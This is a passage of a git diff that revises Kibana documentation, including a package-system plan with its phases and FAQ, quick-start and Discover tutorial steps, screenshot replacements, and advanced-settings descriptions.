now?][status] for information about the current implementation status. ## Goals - Use packages as a core unit of code used throughout the repository -- Packages have well defined boundaries, a single responsibility, and are easily reusable and shareable across the repository when desired +- Packages have well-defined boundaries, a single responsibility, and are easily reusable and shareable across the repository when desired - Support organizing the repository by domain - Allow developers and CI to benefit from a remote cache and incremental builds for all development/validation/build tasks @@ -26,13 +26,13 @@ The size of the Kibana repository has surpassed almost all other Typescript proj These are some of the terms we are using to describe parts of this initiative: Build Tasks/Tasks -: We refer to any task/command that is executed as part of developement or CI as a "build task" or just "task" +: We refer to any task/command that is executed as part of development or CI as a "build task" or just "task". Package : Packages can be installed from NPM, or implemented in the repository. Local packages are structured in a specific way detailed in the [Package Structure](#package-structure) section. Incremental tasks -: The ability to execute the minimal set of build tasks necessary by inspecting the files which have changed and utilizing local+remote caches +: The ability to execute the minimal set of build tasks necessary by inspecting the files which have changed and utilizing local+remote caches. ## Package Structure @@ -41,52 +41,52 @@ Every package has: - a type, see [Package Types](#package-types) - dependencies on other packages in the repo or from NPM declared in their `kibana.jsonc` file and updated automatically - configuration files like `BUILD.bazel`, `jest.config.js`, `package.json`, etc. which are automatically generated when necessary from the `kibana.jsonc` file. - - a single interface. When you import a package you get it's one and only interface. Packages don't have sub-imports, or sub-modules. + - a single interface. When you import a package you get its one (and only) interface. Packages don't have sub-imports or sub-modules. - the ability to include jest tests alongside the code ## Package Types - -Every package is of one of the following types. Using package types allows us to have many different packages and pre-defined build tasks, restrictions, and unique config for each package type. There is currently a proposal to add a new `test-helpers` package type, and we expect more package types to be defined in the future. +Package types allow us to have many different packages, pre-defined build tasks, restrictions, and unique configurations for each package type. Every package is one of the following types: `shared-common` : These packages can be imported from all other packages. `shared-browser` -: These packages can be imported from `shared-browser` and `plugin-browser` packages. Storybooks may be included in package of type `shared-browser`. +: These packages can be imported from `shared-browser` and `plugin-browser` packages. `shared-browser` packages may include Storybooks. `shared-server` : These packages can be imported from `shared-server` and `plugin-server` packages. `shared-scss` -: These packages can be imported by `shared-browser` and `plugin-browser` packages. Instead of an `index.ts` file these pacakges have an `index.scss` file which will be exposed to consumers of this package. +: These packages can be imported by `shared-browser` and `plugin-browser` packages, and expose an `index.scss` file to consumers instead of an `index.ts` file. `plugin-browser` -: These packages expose types to other packages via a root `types.ts` file, `import type` statements must be used when importing. Module IDs must end with `-plugin-browser`. +: These packages expose types to other packages via a root `types.ts` file. Module IDs must end with `-plugin-browser`. Consumers must use `import type` statements. `plugin-server` -: These packages expose types to other packages via a root `types.ts` file, `import type` statements must be used when importing. Module IDs must end with `-plugin-server`. +: These packages expose types to other packages via a root `types.ts` file. Module IDs must end with `-plugin-server`. Consumers must use `import type` statements. `functional-test` -: These packages can not be imported by other packages and expose one or more functional testing configurations, including API integration tests. Having this separate means that iterating on functional tests will not need to rebuild the application and updating the application will usually not rebuild the tests. - +: These packages expose one or more functional testing configurations, including API integration tests, and can not be imported by other packages. Separating functional and integration tests allows us to iterate on tests without rebuilding the application. Similarly, iterating and updating the application should mostly mean the tests don't need to rebuild. +There is currently a proposal to add a new `test-helpers` package type, and we expect more package types to be defined in the future if and when the need arises. + ## Phases -We're planning to implement the full package system described in phases. Currently, those phases look like this: +We're planning to implement the full package system in phases. Currently, those phases look like this: ### Phase 1: Ground preparation **status:** ✅ complete -This phase is about identifying issues that would prevent a migration for teams in order to provide adequate time for them before they have the need to migrate. +This phase is about identifying issues that would prevent a migration for teams to provide adequate time for them before they need to migrate. - Migrate all plugins to use module IDs - - Find instances of ESLint being disabled and illegal cross-boundary imports are used; create issues for teams to address + - Find instances where ESLint is disabled and illegal cross-boundary imports are used; create issues for teams to address - Prevent naked eslint-disable - Prevent disabling specific ESLint rules - Windows development is not supported - - Rewrite @kbn/pm using native Node.js to remove its build step. Anything outside of bootstrap like clean and reset commands will move to different packages. - - Document how to break up packages into smaller pieces + - Rewrite `@kbn/pm` using native Node.js to remove its build step. Anything outside of bootstrap, like clean and reset commands, will move to different packages. + - Document how to break up packages into smaller units of code ### Phase 2: Legacy packages migration @@ -94,9 +94,9 @@ This phase is about identifying issues that would prevent a migration for teams This phase is about migrating the existing legacy packages to one of the [package types](#package-types). - - Add kibana.json files to existing packages - - Auto generating configuration files based on the `kibana.jsonc` manifest - - Discover dependencies used in packages automatically + - Add `kibana.json` files to existing packages + - Auto-generate configuration files based on `kibana.jsonc` manifests + - Automate package dependency discovery ### Phase 3: Double down on DX @@ -116,13 +116,13 @@ This phase is all about supporting the creation of plugin-browser and plugin-ser - Extracting Webpack config from @kbn/optimizer to work on a single bundle inside Bazel - Update plugin discovery to find and differentiate between legacy plugins and plugin-browser/server packages - ESLint rules to validate imports into and out of plugin-browser and plugin-server packages - - Finish the migration of core to packages and reflect with the core team (and possibly the Shared UX team) around what we should recommend for plugin authors before we start to migrate legacy plugins to the package system + - Finish the migration of core to packages and reflect with the core team (and possibly the Shared UX team) on what we should recommend for plugin authors before we start to migrate legacy plugins to the package system - Documentation, documentation, documentation - How do 3rd party plugins migrate to the new system? ### Phase 5: Legacy plugins migration -This phase is all about having the solution teams migrating their legacy plugins into packages. +This phase is all about having the solution teams migrate their legacy plugins into packages. - Identify the order of plugins that can be migrated - Identify and communicate what needs to be done by teams @@ -137,40 +137,40 @@ This phase is about finalizing the rough edges and making sure every piece of co - Extend the package development tooling to support 3rd party package development and allow packages to participate in the benefits of Bazel within the `plugins` directory. - Ability for 3rd party packages to require specific versions of specific packages from NPM - Automatically build the components that need changes - - Build package artifacts that can be installed in Kibana distributables + - Build package artifacts that can be installed in a Kibana distributable ## FAQ ### Is it time for me to start creating packages? -Probably not. The Shared UX and Core teams are currently our Guinea Pig teams and they're experiencing the pain of living on the bleeding edge. If you want to create a single package you are welcome to, but for now it's probably best that you wait until Operations reached out to your team. +Probably not. The Shared UX and Core teams are currently our "Guinea Pig" teams and they're experiencing the pain of living on the bleeding edge. If you want to create a single package you are welcome to, but for now, it's probably best that you wait until Operations reached out to your team. ### How do circular dependencies work? -By breaking the repository into packages we not be able to support cross-package circular dependency. +By breaking the repository into packages we can't support cross-package circular dependencies. -Imagine trying to build the types for `@kbn/a`, which depend on the types for `@kbn/b`. If `@kbn/b` also depends on the types for `@kbn/a` there is no way to build the types for eather package because they form a circular dependency. +For example, imagine trying to build the types for `@kbn/a` that depend on the types for `@kbn/b`. If `@kbn/b` also depends on the types for `@kbn/a` there's a circular dependency meaning there isn't a way to build the types for either. -If you cause a circular dependency in the task graph Bazel will produce a pretty great error message explaining where the cycle is. +If you cause a circular dependency in the task graph, Bazel will produce a pretty great error message explaining where the cycle is. -So far, the solution to resolving circular dependencies has always been to break out some component which is causing the circular dependency into a separate package. Packages are light weight, and are very easy to create ([work in progress][status]) so please feel comfortable creating more packages. +The solution to resolving a circular dependency has, thus far, been to break out the component causing it, into a separate package. Packages are lightweight and are very easy to create ([work in progress][status]) so please feel comfortable creating more packages as you need to. ### How do we name packages? There are a few package naming rules: - all packages must use the `@kbn/` namespace - - `plugin-browser` packages must end with `-plugin-browser` - - `plugin-server` packages must end with `-plugin-server` - - be considerate of the fact that we are operating in a global namespace and avoid overly generic names + - `plugin-browser`-type packages must end with `-plugin-browser` + - `plugin-server- type packages must end with `-plugin-server` + - considering that we operate in a global namespace, avoid overly generic names -Other than these rules, it's up to you what the best name for your package is. +Other than these rules, it's up to you and your team to decide on an appropriate name for your package. - Keep the single responsibility principle in mind, if there isn't a clear name for your package it might mean that it includes too many things and should be split into multiple smaller packages with explicit purposes. + Keep the single responsibility principle in mind. A good indication that a package contains too much is that naming it isn’t easy. In such cases, consider splitting it into multiple, smaller packages with their specific purpose. -The shared-ux team makes a lot of packages containing a single component which is widely shared and provides a lot of helpers and types for other packages to consume, the shared-ux team has used the following naming scheme: +The shared-ux team makes a lot of packages, each containing a single, widely shared component along with helpers and types, for other packages to consume. The shared-ux team has used the following naming scheme: ``` /{domain}/{componentName} @@ -191,15 +191,15 @@ The `@kbn/{team}-{domain}-{component}(-{type})?` style naming scheme is also fol ### Where do I put my package? -The only rule the package system enforces is that packages can't live inside of other packages. Additionally, for licensing purposes it's probably best to keep SSPL licensed code in the `packages` or `src` directories and Elastic licensed code in the `x-pack` directory. +The only rule the package system enforces is that packages can't live inside of other packages. Additionally, for licensing purposes, it's probably best to keep SSPL licensed code in the `packages` or `src` directories and Elastic licensed code in the `x-pack` directory. -Otherise, you can put your packages wherever you like. It's probably best that you don't put them in the current `packages` directory as it's huge and only getting bigger with time. +Otherwise, you can put your packages wherever you like. It's probably best that you don't put them in the current `packages` directory as it's huge and only getting bigger with time. To define a new directory where packages will live you will need to edit the [`BAZEL_PACKAGE_DIRS`][pkgDirs] const. This list points to all the directories where packages can live in the repository and includes the current list of locations where packages are being created. ### What works now? -Today we have a basic package generator that produces legacy package definitions. We're done laying the groundwork now and have both the Core and Shared UX teams playing guinea pig. You can use the legacy package generator with `node scripts/generate package` and create a package, but it's not the right time for more teams to start migrating large portions of their code to packages. +Today we have a simplistic package generator that produces legacy package definitions. We've finished laying the groundwork and have both the Core and Shared UX teams experimenting with it. You can use the legacy package generator with `node scripts/generate package` and create a package, however, we don’t recommend other teams to start migrating large portions of their code to packages just yet. We're now entering Phase 2 of the plan, more details about the phases of our plan can be found [above](#phases) diff --git a/docs/canvas/canvas-tutorial.asciidoc b/docs/canvas/canvas-tutorial.asciidoc index 389cac89cde82..73d808a183920 100644 --- a/docs/canvas/canvas-tutorial.asciidoc +++ b/docs/canvas/canvas-tutorial.asciidoc @@ -9,9 +9,11 @@ To familiarize yourself with *Canvas*, add the Sample eCommerce orders data, the To create a workpad of the eCommerce store data, add the data set, then create the workpad. -. Go to the {kib} *Home* page, then click *Try our sample data*. +. On the home page, click *Try sample data*. -. On the *Sample eCommerce orders data* card, click *Add data*. +. Click *Other sample data sets*. + +. On the *Sample eCommerce orders* card, click *Add data*. . Open the main menu, then click *Canvas*. diff --git a/docs/concepts/data-views.asciidoc b/docs/concepts/data-views.asciidoc index 9e2015fc730a4..8726b3a55cbd0 100644 --- a/docs/concepts/data-views.asciidoc +++ b/docs/concepts/data-views.asciidoc @@ -65,7 +65,7 @@ based on different timestamps. . To specify your own {data-source} name, click *Show advanced settings*, then enter the name in the *Custom {data-source} ID* field. For example, enter your {es} index alias name. -. Click *Create {data-source}*. +. Click *Save {data-source} to {kib}*. + [[reload-fields]] {kib} is now configured to use your {es} data. When a new field is added to an index, the {data-source} field list is updated @@ -149,4 +149,4 @@ WARNING: Deleting a {data-source} breaks all visualizations, saved searches, and . Open the main menu, then click *Stack Management > Data Views*. . Find the {data-source} that you want to delete, and then -click (image:management/index-patterns/images/delete.png[Delete icon]) in the *Actions* column. +click image:management/index-patterns/images/delete.png[Delete icon] in the *Actions* column. diff --git a/docs/developer/getting-started/monorepo-packages.asciidoc b/docs/developer/getting-started/monorepo-packages.asciidoc index b6524c6007b2e..a9dc912ab58e4 100644 --- a/docs/developer/getting-started/monorepo-packages.asciidoc +++ b/docs/developer/getting-started/monorepo-packages.asciidoc @@ -41,8 +41,6 @@ yarn kbn watch [discrete] === List of Already Migrated Packages to Bazel -- @elastic/eslint-config-kibana -- @elastic/safer-lodash-set - @kbn/ace - @kbn/analytics - @kbn/apm-config-loader @@ -57,6 +55,7 @@ yarn kbn watch - @kbn/docs-utils - @kbn/es - @kbn/es-archiver +- @kbn/eslint-config-kibana - @kbn/eslint-plugin-eslint - @kbn/expect - @kbn/i18n @@ -68,6 +67,7 @@ yarn kbn watch - @kbn/optimizer - @kbn/plugin-helpers - @kbn/rule-data-utils +- @kbn/safer-lodash-set - @kbn/securitysolution-autocomplete - @kbn/securitysolution-es-utils - @kbn/securitysolution-hook-utils diff --git a/docs/developer/plugin-list.asciidoc b/docs/developer/plugin-list.asciidoc index 64077b2ecc106..00f0bc517f5a5 100644 --- a/docs/developer/plugin-list.asciidoc +++ b/docs/developer/plugin-list.asciidoc @@ -259,10 +259,6 @@ oss plugins. generating deep links to other apps using locators, and creating short URLs. -|{kib-repo}blob/{branch}/src/plugins/shared_ux/README.md[sharedUX] -|Our mission is to make consistency in our user experience a product. - - |{kib-repo}blob/{branch}/src/plugins/telemetry/README.md[telemetry] |Telemetry allows Kibana features to have usage tracked in the wild. The general term "telemetry" refers to multiple things: diff --git a/docs/discover/document-explorer.asciidoc b/docs/discover/document-explorer.asciidoc index 665d668a41ee7..32811cfbe7728 100644 --- a/docs/discover/document-explorer.asciidoc +++ b/docs/discover/document-explorer.asciidoc @@ -27,13 +27,13 @@ data-type="inline" Use drag and drop to organize the columns and improve the view of the data. -To reorder columns, do one of the following: +* To move a single column, click its header. In the dropdown menu, +click *Move left* or *Move right*. -* Click *Columns*. In the pop-up, select the column you want to move and drag it to the new location. +* To move multiple columns, click *Columns*. +In the pop-up, drag the column names to their new order. -* Click the header of the column you want to move. In the dropdown menu, click *Move left* or *Move right*. - -To resize a column, drag the right edge of the column header until the column is the width that you want. +* To resize a column, drag the right edge of the column header until the column is the width that you want. Column widths are stored with a saved search. When you visualize saved searches on dashboards, the saved search appears the same as in **Discover**. @@ -104,7 +104,7 @@ You can view the document in two ways. The **Table** view displays the document The **JSON** (JavaScript Object Notation) view allows you to look at how {es} returns the document. + [role="screenshot"] -image::images/document-explorer-expand.png[Expanded view of the document table] +image::images/document-table-expanded.png[Expanded view of the document table] + . In the *Table* view, scan through the fields and their values, or search for a field by name. @@ -152,4 +152,4 @@ By default, the document table displays 100 rows per page. To change this number click *Rows per page*. [role="screenshot"] -image::images/document-table-rows-per-page.png["Menu with options for setting the number of rows in the document table", width=50%] +image::images/document-table-rows-per-page.png["Menu with options for setting the number of rows in the document table"] diff --git a/docs/discover/field-statistics.asciidoc b/docs/discover/field-statistics.asciidoc index 52f78f3376cda..6c5b5a6767a50 100644 --- a/docs/discover/field-statistics.asciidoc +++ b/docs/discover/field-statistics.asciidoc @@ -16,7 +16,7 @@ the <>, or you can use your own d . Open the main menu, and click *Discover*. -. Expand the {data-source} dropdown, and select *kibana_sample_data_logs*. +. Expand the {data-source} dropdown, and select *Kibana Sample Data Logs*. . If you don’t see any results, expand the time range, for example, to *Last 7 days*. diff --git a/docs/discover/images/customer.png b/docs/discover/images/customer.png index 2ab177eba28bf..c60c98b25e54d 100644 Binary files a/docs/discover/images/customer.png and b/docs/discover/images/customer.png differ diff --git a/docs/discover/images/discover-context.png b/docs/discover/images/discover-context.png index b625a18b35aa2..35954fa7a2b51 100644 Binary files a/docs/discover/images/discover-context.png and b/docs/discover/images/discover-context.png differ diff --git a/docs/discover/images/discover-data-view.png b/docs/discover/images/discover-data-view.png index c73af3db24140..50b1866ab7a68 100644 Binary files a/docs/discover/images/discover-data-view.png and b/docs/discover/images/discover-data-view.png differ diff --git a/docs/discover/images/discover-from-visualize.png b/docs/discover/images/discover-from-visualize.png index 74307bcd46a2c..2a3ba610299b6 100644 Binary files a/docs/discover/images/discover-from-visualize.png and b/docs/discover/images/discover-from-visualize.png differ diff --git a/docs/discover/images/discover-search-for-relevance.png b/docs/discover/images/discover-search-for-relevance.png index d9d5834c9e382..e710cab0ddf2f 100644 Binary files a/docs/discover/images/discover-search-for-relevance.png and b/docs/discover/images/discover-search-for-relevance.png differ diff --git a/docs/discover/images/discover-sidebar-available-fields.png b/docs/discover/images/discover-sidebar-available-fields.png index e330036524ae7..363f3f7141086 100644 Binary files a/docs/discover/images/discover-sidebar-available-fields.png and b/docs/discover/images/discover-sidebar-available-fields.png differ diff --git a/docs/discover/images/discover.png b/docs/discover/images/discover.png index 818b9ed5d2599..1a2d839717f76 100644 Binary files a/docs/discover/images/discover.png and b/docs/discover/images/discover.png differ diff --git a/docs/discover/images/document-table-expanded.png b/docs/discover/images/document-table-expanded.png index 0248c31f894e0..06b244268c1d7 100644 Binary files a/docs/discover/images/document-table-expanded.png and b/docs/discover/images/document-table-expanded.png differ diff --git a/docs/discover/images/document-table-rows-per-page.png b/docs/discover/images/document-table-rows-per-page.png index 21643903e4021..54ab8c359239a 100644 Binary files a/docs/discover/images/document-table-rows-per-page.png and b/docs/discover/images/document-table-rows-per-page.png differ diff --git a/docs/discover/images/document-table.png b/docs/discover/images/document-table.png index 388f3c4344a09..6cb47390fd584 100644 Binary files a/docs/discover/images/document-table.png and b/docs/discover/images/document-table.png differ diff --git a/docs/discover/images/hello-field.png b/docs/discover/images/hello-field.png index 8dd38a9f94209..40527e90fbb64 100644 Binary files a/docs/discover/images/hello-field.png and b/docs/discover/images/hello-field.png differ diff --git a/docs/discover/search-for-relevance.asciidoc b/docs/discover/search-for-relevance.asciidoc index df581634877f1..c6f092edd0015 100644 --- a/docs/discover/search-for-relevance.asciidoc +++ b/docs/discover/search-for-relevance.asciidoc @@ -10,7 +10,7 @@ the <>, or you can use your ow . In *Discover*, open the {data-source} dropdown, and select the data that you want to work with. + -For the sample flights data, set the {data-source} to *kibana_sample_data_flights*. +For the sample flights data, set the {data-source} to *Kibana Sample Data Flights*. . Run your search. For the sample data, try: + @@ -32,4 +32,4 @@ image::images/field-sorting-popover.png["Field sorting popover", width=60%] Your table now sorts documents from most to least relevant. + [role="screenshot"] -image::images/discover-search-for-relevance.png["Documents are sorted from most relevant to least relevant.", width=75%] +image::images/discover-search-for-relevance.png["Documents are sorted from most relevant to least relevant."] diff --git a/docs/getting-started/images/addData_sampleDataCards_7.15.0.png b/docs/getting-started/images/addData_sampleDataCards_7.15.0.png deleted file mode 100644 index 27e10b98b9670..0000000000000 Binary files a/docs/getting-started/images/addData_sampleDataCards_7.15.0.png and /dev/null differ diff --git a/docs/getting-started/images/addData_sampleDataCards_8.4.0.png b/docs/getting-started/images/addData_sampleDataCards_8.4.0.png new file mode 100644 index 0000000000000..49a83dbbdc10b Binary files /dev/null and b/docs/getting-started/images/addData_sampleDataCards_8.4.0.png differ diff --git a/docs/getting-started/images/addFilterOptions_dashboard_8.4.0.png b/docs/getting-started/images/addFilterOptions_dashboard_8.4.0.png new file mode 100644 index 0000000000000..eb16edb2b0764 Binary files /dev/null and b/docs/getting-started/images/addFilterOptions_dashboard_8.4.0.png differ diff --git a/docs/getting-started/images/addFilter_dashboard_8.4.0.png b/docs/getting-started/images/addFilter_dashboard_8.4.0.png new file mode 100644 index 0000000000000..eeec26daad89d Binary files /dev/null and b/docs/getting-started/images/addFilter_dashboard_8.4.0.png differ diff --git a/docs/getting-started/images/availableFields_discover_8.4.0.png b/docs/getting-started/images/availableFields_discover_8.4.0.png new file mode 100644 index 0000000000000..ba3b9ecaeb4ac Binary files /dev/null and b/docs/getting-started/images/availableFields_discover_8.4.0.png differ diff --git a/docs/getting-started/images/dashboard_ecommerceRevenueDashboard_7.15.0.png b/docs/getting-started/images/dashboard_ecommerceRevenueDashboard_7.15.0.png index 5b62832b1d093..7fbc0a9bad411 100644 Binary files a/docs/getting-started/images/dashboard_ecommerceRevenueDashboard_7.15.0.png and b/docs/getting-started/images/dashboard_ecommerceRevenueDashboard_7.15.0.png differ diff --git a/docs/getting-started/images/dashboard_sampleDataAddFilter_8.4.0.png b/docs/getting-started/images/dashboard_sampleDataAddFilter_8.4.0.png new file mode 100644 index 0000000000000..4c253d3fc3ac5 Binary files /dev/null and b/docs/getting-started/images/dashboard_sampleDataAddFilter_8.4.0.png differ diff --git a/docs/getting-started/images/dashboard_sampleDataFilter_7.15.0.png b/docs/getting-started/images/dashboard_sampleDataFilter_7.15.0.png deleted file mode 100644 index f1f46ab42371a..0000000000000 Binary files a/docs/getting-started/images/dashboard_sampleDataFilter_7.15.0.png and /dev/null differ diff --git a/docs/getting-started/images/ecommerceTreemap_lens_8.4.0.png b/docs/getting-started/images/ecommerceTreemap_lens_8.4.0.png new file mode 100644 index 0000000000000..d933ce93de9d1 Binary files /dev/null and b/docs/getting-started/images/ecommerceTreemap_lens_8.4.0.png differ diff --git a/docs/getting-started/images/kql_discover_8.4.0.png b/docs/getting-started/images/kql_discover_8.4.0.png new file mode 100644 index 0000000000000..cc0398049013a Binary files /dev/null and b/docs/getting-started/images/kql_discover_8.4.0.png differ diff --git a/docs/getting-started/images/sampleDataFilter_dashboard_8.4.0.png b/docs/getting-started/images/sampleDataFilter_dashboard_8.4.0.png new file mode 100644 index 0000000000000..7b5af0ad39395 Binary files /dev/null and b/docs/getting-started/images/sampleDataFilter_dashboard_8.4.0.png differ diff --git a/docs/getting-started/images/timeFilter_discover_8.4.0.png b/docs/getting-started/images/timeFilter_discover_8.4.0.png new file mode 100644 index 0000000000000..73f13ef2b1d9c Binary files /dev/null and b/docs/getting-started/images/timeFilter_discover_8.4.0.png differ diff --git a/docs/getting-started/images/tutorial-discover-2.png b/docs/getting-started/images/tutorial-discover-2.png deleted file mode 100644 index cf217562c37fd..0000000000000 Binary files a/docs/getting-started/images/tutorial-discover-2.png and /dev/null differ diff --git a/docs/getting-started/images/tutorial-discover-3.png b/docs/getting-started/images/tutorial-discover-3.png deleted file mode 100644 index 79cf94058bb76..0000000000000 Binary files a/docs/getting-started/images/tutorial-discover-3.png and /dev/null differ diff --git a/docs/getting-started/images/tutorial-discover-4.png b/docs/getting-started/images/tutorial-discover-4.png deleted file mode 100644 index 584221e8cfd04..0000000000000 Binary files a/docs/getting-started/images/tutorial-discover-4.png and /dev/null differ diff --git a/docs/getting-started/images/tutorial-visualization-dropdown.png b/docs/getting-started/images/tutorial-visualization-dropdown.png deleted file mode 100644 index a069af95ed14a..0000000000000 Binary files a/docs/getting-started/images/tutorial-visualization-dropdown.png and /dev/null differ diff --git a/docs/getting-started/images/tutorial-visualization-treemap.png b/docs/getting-started/images/tutorial-visualization-treemap.png deleted file mode 100644 index c6e8db133cb44..0000000000000 Binary files a/docs/getting-started/images/tutorial-visualization-treemap.png and /dev/null differ diff --git a/docs/getting-started/images/visualizationTypeDropdown_lens_8.4.0.png b/docs/getting-started/images/visualizationTypeDropdown_lens_8.4.0.png new file mode 100644 index 0000000000000..731327997c59b Binary files /dev/null and b/docs/getting-started/images/visualizationTypeDropdown_lens_8.4.0.png differ diff --git a/docs/getting-started/quick-start-guide.asciidoc b/docs/getting-started/quick-start-guide.asciidoc index 2667729f4b854..bc98fbf5af737 100644 --- a/docs/getting-started/quick-start-guide.asciidoc +++ b/docs/getting-started/quick-start-guide.asciidoc @@ -1,13 +1,13 @@ [[get-started]] == Quick start -To quickly get up and running with {kib}, set up on Cloud, then add a sample data set that you can explore and analyze. +To quickly get up and running with {kib}, set up on Cloud, then add a sample data set that you can explore and visualize. -When you've finished, you'll know how to: +When you're done, you'll know how to: * <> -* <> +* <> [float] === Required privileges @@ -26,12 +26,14 @@ include::{docs-root}/shared/cloud/ess-getting-started.asciidoc[] Sample data sets come with sample visualizations, dashboards, and more to help you explore {kib} before you ingest or add your own data. -. On the home page, click *Try our sample data*. +. On the home page, click *Try sample data*. + +. Click *Other sample data sets*. . On the *Sample eCommerce orders* card, click *Add data*. + [role="screenshot"] -image::images/addData_sampleDataCards_7.15.0.png[Add data UI for the sample data sets] +image::images/addData_sampleDataCards_8.4.0.png[Add data UI for the sample data sets] [float] [[explore-the-data]] @@ -44,7 +46,7 @@ image::images/addData_sampleDataCards_7.15.0.png[Add data UI for the sample data . Change the <> to *Last 7 days*. + [role="screenshot"] -image::images/tutorial-discover-2.png[Time filter menu with Last 7 days filter configured] +image::images/timeFilter_discover_8.4.0.png[Time filter menu with Last 7 days filter configured] . To view the sales orders for women's clothing that are $60 or more, use the <> search field: + @@ -52,18 +54,18 @@ image::images/tutorial-discover-2.png[Time filter menu with Last 7 days filter c products.taxless_price >= 60 and category : Women's Clothing + [role="screenshot"] -image::images/tutorial-discover-4.png[Discover tables that displays only the orders for women's clothing that are $60 or more] +image::images/kql_discover_8.4.0.png[Discover tables that displays only the orders for women's clothing that are $60 or more] . To view only the product categories that contain sales orders, hover over the *category* field, then click *+*. + [role="screenshot"] -image::images/tutorial-discover-3.png[Discover table that displays only the product categories that contain orders] +image::images/availableFields_discover_8.4.0.png[Discover table that displays only the product categories that contain orders] [float] [[view-and-analyze-the-data]] -== View and analyze the data +== Visualize the data -A dashboard is a collection of panels that you can use to view and analyze the data. Panels contain visualizations, interactive controls, text, and more. +A dashboard is a collection of panels that you can use to visualize the data. Panels contain visualizations, interactive controls, text, and more. . Open the main menu, then click *Dashboard*. @@ -76,7 +78,7 @@ image::images/dashboard_ecommerceRevenueDashboard_7.15.0.png[The [eCommerce] Rev [[create-a-visualization]] === Create a visualization panel -Create a treemap panel that shows the top sales regions and manufacturers, then add the panel to the dashboard. +Create a treemap visualization panel that shows the top sales regions and manufacturers, then add the panel to the dashboard. . In the toolbar, click *Edit*. @@ -85,7 +87,7 @@ Create a treemap panel that shows the top sales regions and manufacturers, then . In the drag-and-drop visualization editor, open the *Visualization type* dropdown, then select *Treemap*. + [role="screenshot"] -image::getting-started/images/tutorial-visualization-dropdown.png[Chart type menu with Treemap selected] +image::getting-started/images/visualizationTypeDropdown_lens_8.4.0.png[Chart type menu with Treemap selected] . From the *Available fields* list, drag the following fields to the workspace: @@ -94,7 +96,7 @@ image::getting-started/images/tutorial-visualization-dropdown.png[Chart type men * *manufacturer.keyword* + [role="screenshot"] -image::getting-started/images/tutorial-visualization-treemap.png[Treemap that displays Top values of geoip.city_name and Top values or manufacturer.keyword fields] +image::getting-started/images/ecommerceTreemap_lens_8.4.0.png[Treemap that displays Top values of geoip.city_name and Top values or manufacturer.keyword fields] . Click *Save and return*. + @@ -113,26 +115,32 @@ You can interact with the dashboard data using controls that allow you to apply . Click *Apply changes*. + [role="screenshot"] -image::images/dashboard_sampleDataFilter_7.15.0.png[The [eCommerce] Revenue Dashboard that shows only the women's clothing data from the Gnomehouse manufacturer] +image::images/sampleDataFilter_dashboard_8.4.0.png[The [eCommerce] Revenue Dashboard that shows only the women's clothing data from the Gnomehouse manufacturer] [float] [[filter-and-query-the-data]] === Filter the data -To view a subset of the data, you can apply filters to the dashboard panels. Apply a filter to view the women's clothing data generated on Wednesday from the Gnomehouse manufacturer. +To view a subset of the data, you can apply filters to the dashboard data. Apply a filter to view the women's clothing data generated on Wednesday from the Gnomehouse manufacturer. . Click *Add filter*. ++ +[role="screenshot"] +image::images/addFilter_dashboard_8.4.0.png[The Add filter action that applies dashboard-level filters] . From the *Field* dropdown, select *day_of_week*. . From the *Operator* dropdown, select *is*. . From the *Value* dropdown, select *Wednesday*. ++ +[role="screenshot"] +image::images/addFilterOptions_dashboard_8.4.0.png[The Add filter options configured to display only the women's clothing data generated on Wednesday from the Gnomehouse manufacturer] -. Click *Save*. +. Click *Add filter*. + [role="screenshot"] -image::images/dashboard_sampleDataAddFilter_7.15.0.png[The [eCommerce] Revenue Dashboard that shows only the women's clothing data generated on Wednesday from the Gnomehouse manufacturer] +image::images/dashboard_sampleDataAddFilter_8.4.0.png[The [eCommerce] Revenue Dashboard that shows only the women's clothing data generated on Wednesday from the Gnomehouse manufacturer] [float] [[quick-start-whats-next]] @@ -142,6 +150,6 @@ image::images/dashboard_sampleDataAddFilter_7.15.0.png[The [eCommerce] Revenue D *Explore your own data in Discover.* Ready to learn more about exploring your data in *Discover*? Go to <>. -*Create a dashboard with your own data.* Ready to learn more about analyzing your data in *Dashboard*? Go to <>. +*Create a dashboard with your own data.* Ready to learn more about visualizing your data on a *Dashboard*? Go to <>. *Try out the {ml-features}.* Ready to analyze the sample data sets and generate models for its patterns of behavior? Go to {ml-docs}/ml-getting-started.html[Getting started with {ml}]. diff --git a/docs/management/advanced-options.asciidoc b/docs/management/advanced-options.asciidoc index c0fdb537aed73..7a1eaae676906 100644 --- a/docs/management/advanced-options.asciidoc +++ b/docs/management/advanced-options.asciidoc @@ -286,8 +286,8 @@ in the current data view is used. The columns that appear by default on the *Discover* page. The default is `_source`. -[[discover-samplesize]]`discover:sampleSize`:: -The number of rows to show in the *Discover* table. +[[discover:enableSql]]`discover:enableSql`:: +experimental[] Allows SQL queries for search. [[discover-max-doc-fields-displayed]]`discover:maxDocFieldsDisplayed`:: Specifies the maximum number of fields to show in the document column of the *Discover* table. @@ -295,11 +295,14 @@ Specifies the maximum number of fields to show in the document column of the *Di [[discover-modify-columns-on-switch]]`discover:modifyColumnsOnSwitch`:: When enabled, removes the columns that are not in the new data view. -[[discover-sample-size]]`discover:sampleSize`:: -Specifies the number of rows to display in the *Discover* table. +[[discover-row-height-option]]`discover:rowHeightOption`:: +The number of lines to allow in a row. A value of -1 automatically adjusts the row height to fit the contents. A value of 0 displays the content in a single line. [[discover-sampleRowsPerPage]]`discover:sampleRowsPerPage`:: -Specifies the number of rows to display per page in the *Discover* table. +Limits the number of rows per page in the document table. + +[[discover-sample-size]]`discover:sampleSize`:: +Sets the maximum number of rows for the entire document table. This is the maximum number of documents fetched from {es}. [[discover-searchFieldsFromSource]]`discover:searchFieldsFromSource`:: Load fields from the original JSON {ref}/mapping-source-field.html[`_source`]. @@ -310,8 +313,12 @@ When disabled, *Discover* loads fields using the {es} search API's Controls whether a search is executed when *Discover* first loads. This setting does not have an effect when loading a saved search. +[[discover:showFieldStatistics]]`discover:showFieldStatistics`:: +beta[] Enables the Field statistics view. Examine details such as +the minimum and maximum values of a numeric field or a map of a geo field. + [[discover:showMultiFields]]`discover:showMultiFields`:: -When enabled, displays multi-fields in the expanded document view. +Controls the display of multi-fields in the expanded document view. [[discover-sort-defaultorder]]`discover:sort:defaultOrder`:: The default sort direction for time-based data views. @@ -319,9 +326,6 @@ The default sort direction for time-based data views. [[doctable-hidetimecolumn]]`doc_table:hideTimeColumn`:: Hides the "Time" column in *Discover* and in all saved searches on dashboards. -[[discover:enableSql]]`discover:enableSql`:: -When enabled, allows SQL queries for search. - [[doctable-highlight]]`doc_table:highlight`:: Highlights results in *Discover* and saved searches on dashboards. Highlighting slows requests when working on big documents. @@ -331,6 +335,10 @@ Controls the way 